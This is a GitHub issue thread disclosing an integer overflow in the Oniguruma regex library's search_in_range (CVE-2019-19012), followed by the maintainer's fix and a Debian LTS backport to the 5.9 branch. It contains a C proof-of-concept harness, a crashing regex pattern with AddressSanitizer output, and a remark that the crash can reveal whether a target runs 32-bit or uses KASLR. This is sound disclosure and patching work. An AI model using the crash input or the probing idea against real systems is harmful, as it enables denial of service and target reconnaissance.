kkos / oniguruma

regular expression library

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Integer overflow related to reg->dmax in search_in_range (regexec.c)

ManhNDd opened this issue · comments

Hello,
I found an integer overflow in search_in_range at regexec.c:5365:

5360	      sch_range = (UChar* )range;
5361	      if (reg->dmax != 0) {
5362	        if (reg->dmax == INFINITE_LEN)
5363	          sch_range = (UChar* )end;
5364	        else {
5365	          sch_range += reg->dmax;  //// => overflow
5366	          if (sch_range > end) sch_range = (UChar* )end;
5367	        }
5368	      }

reg->dmax is max repeat num, whose type is unsigned int. ONIG_MAX_REPEAT_NUM is 100000, but it can be multiplied into a very large number with distance_multiply at:

6152	        }
6153	
6154	        max = (xo.len.max > 0 ? INFINITE_LEN : 0);
6155	      }
6156	      else {
6157	        max = distance_multiply(xo.len.max, qn->upper);    //// => multiply into dmax
6158	      }
6159	
6160	      min = distance_multiply(xo.len.min, qn->lower);      //// => multiply into dmin
6161	      set_mml(&opt->len, min, max); 

And Sch_range is a pointer. So if compiled in 32bit, sch_range += reg->dmax results into integer overflow.
There should be other places related to reg->dmax/dmin which are vulnerable to integer overflow.

PoC:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include "oniguruma.h"

static int
search(regex_t* reg, unsigned char* str, unsigned char* end)
{
  int r;
  unsigned char *start, *range;
  OnigRegion *region;

  region = onig_region_new();

  start = str;
  range = end;
  r = onig_search(reg, str, end, start, range, region, ONIG_OPTION_NONE);
  if (r >= 0 ) {
    int i;

    fprintf(stdout, "match at %d  (%s)\n", r,
            ONIGENC_NAME(onig_get_encoding(reg)));
    for (i = 0; i < region->num_regs; i++) {
      fprintf(stdout, "%d: (%d-%d)\n", i, region->beg[i], region->end[i]);
    }
  }
  else if (r == ONIG_MISMATCH) {
    fprintf(stdout, "search fail (%s)\n",
            ONIGENC_NAME(onig_get_encoding(reg)));
  }
  else { /* error */
    char s[ONIG_MAX_ERROR_MESSAGE_LEN];
    onig_error_code_to_str((UChar* )s, r);
    fprintf(stdout, "ERROR: %s\n", s);
    fprintf(stdout, "  (%s)\n", ONIGENC_NAME(onig_get_encoding(reg)));
    
    onig_region_free(region, 1 /* 1:free self, 0:free contents only */);
    return -1;
  }

  onig_region_free(region, 1 /* 1:free self, 0:free contents only */);
  return 0;
}

int main(int argc, char* argv[])
{
  int r;
  regex_t* reg;
  OnigErrorInfo einfo;

  char *pattern = argv[1];
  char *pattern_end = pattern + strlen(pattern);
  OnigEncodingType *enc = ONIG_ENCODING_ASCII;

  char* str = argv[2];
  char* str_end = str+strlen(str);

  onig_initialize(&enc, 1);
  r = onig_new(&reg, (unsigned char *)pattern, (unsigned char *)pattern_end,
               ONIG_OPTION_IGNORECASE, enc, ONIG_SYNTAX_DEFAULT, &einfo);
  if (r != ONIG_NORMAL) {
    char s[ONIG_MAX_ERROR_MESSAGE_LEN];
    onig_error_code_to_str((UChar* )s, r, &einfo);
    fprintf(stdout, "ERROR: %s\n", s);
    onig_end();

    if (r == ONIGERR_PARSER_BUG ||
        r == ONIGERR_STACK_BUG  ||
        r == ONIGERR_UNDEFINED_BYTECODE ||
        r == ONIGERR_UNEXPECTED_BYTECODE) {
      return -2;
    }
    else
      return -1;
  }

  if (onigenc_is_valid_mbc_string(enc, str, str_end) != 0) {
    r = search(reg, str, str_end);
  } else {
    fprintf(stdout, "Invalid string\n");
  }

  onig_free(reg);
  onig_end();
  return 0;
}

Compilation:

./configure CC=gcc CFLAGS="-m32 -O0 -ggdb3 -fsanitize=address" LDFLAGS="-m32 -O0 -ggdb3 -fsanitize=address"
gcc -m32 -fsanitize=address -O0 -I./oniguruma-gcc-asan-32/src -ggdb3 poc-dmax-search-in-range.c ./oniguruma-gcc-asan-32/src/.libs/libonig.a -o poc-dmax-search-in-range

Output with pattern = x{55380}{77548}0 and string = x:

root@manh-ubuntu16:~/fuzz/fuzz_oniguruma# ./poc-dmax-search-in-range x{55380}{77548}0 x
ASAN:SIGSEGV
=================================================================
==1347==ERROR: AddressSanitizer: SEGV on unknown address 0xffc6fd0b (pc 0x080bf994 bp 0xffcc6768 sp 0xffcc6730 T0)
    #0 0x80bf993 in sunday_quick_search /root/fuzz/fuzz_oniguruma/oniguruma-gcc-asan-32/src/regexec.c:4831
    #1 0x80c0685 in forward_search /root/fuzz/fuzz_oniguruma/oniguruma-gcc-asan-32/src/regexec.c:4956
    #2 0x80c2830 in search_in_range /root/fuzz/fuzz_oniguruma/oniguruma-gcc-asan-32/src/regexec.c:5375
    #3 0x80c17f4 in onig_search /root/fuzz/fuzz_oniguruma/oniguruma-gcc-asan-32/src/regexec.c:5168
    #4 0x8048cc4 in search /root/fuzz/fuzz_oniguruma/poc-dmax-search-in-range.c:17
    #5 0x8049536 in main /root/fuzz/fuzz_oniguruma/poc-dmax-search-in-range.c:78
    #6 0xf703d636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    #7 0x8048b00  (/root/fuzz/fuzz_oniguruma/poc-dmax-search-in-range+0x8048b00)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/fuzz/fuzz_oniguruma/oniguruma-gcc-asan-32/src/regexec.c:4831 sunday_quick_search
==1347==ABORTING

In sunday_quick_search, the PoC gets crashed because p points to an invalid memory address. If it does not crash, p luckily points to a valid memory address.
That it crashes or does not crash depends on the supplied pattern. This bug at least can be used to detect if the target system is 32bit or not. And if the target system is 32bit, is the KASLR is enable or not (constantly crashes or constantly no-crashes means no KASLR).

--
Thanks & Regards,
Nguyễn Đức Mạnh
[E] v.manhnd@vincss.net

I could not reproduce the same result(SEGV).
But overflow is a problem, I fixed it.

You can make it crash by changing a, b in x{a}{b}0.
Can I request a CVE for this issue?

Yes.
Please tell me when you know the number.
It is better not to contact me as much as possible from the organization.

This was assigned CVE-2019-19012.

commented

Hi,
I'm part of the Debian Long Term Support team and I'm working on a libonig security update.
Is there plan to fix this vulnerability in the 5.9 branch?

I'm not going to do anything about this or anything else.

commented

I backported the 5 patches to 5.9.5. Comments welcome:
CVE-2019-19012.patch.zip

I have not confirmed the execution.

(1) Casting with ptrdiff_t is unnecessary.
Casting was put in, but on the contrary, the result was strange, so I stopped it.

(2) The last change is different from me.

      else { /* check only. */
        if ((end - range) < reg->threshold_len) goto mismatch;

        if (backward_search_range(reg, str, end, sch_start, min_range, adjrange,
                                  &low, &high) <= 0) goto mismatch;
      }
      else { /* check only. */
        sch_start = onigenc_get_prev_char_head(reg->enc, str, end);
        if (backward_search_range(reg, str, end, sch_start, min_range, adjrange,
                                  &low, &high) <= 0) goto mismatch;
      }
commented

Thanks a lot for having a look.

(1) I missed one ptrdiff_t when applying 778a43d , this is now fixed (and I dropped the extra #include as well).

(2) the original 5.x file is different too and doesn't use onigenc_get_prev_char_head at all; I tried to stick to the original logic but I may be wrong.

For execution I tested with make check and php5's mbstring testsuite.

Updated 5.x patch: CVE-2019-19012.patch.zip

I confirmed the contents.
I think this is good.

commented

Thank you.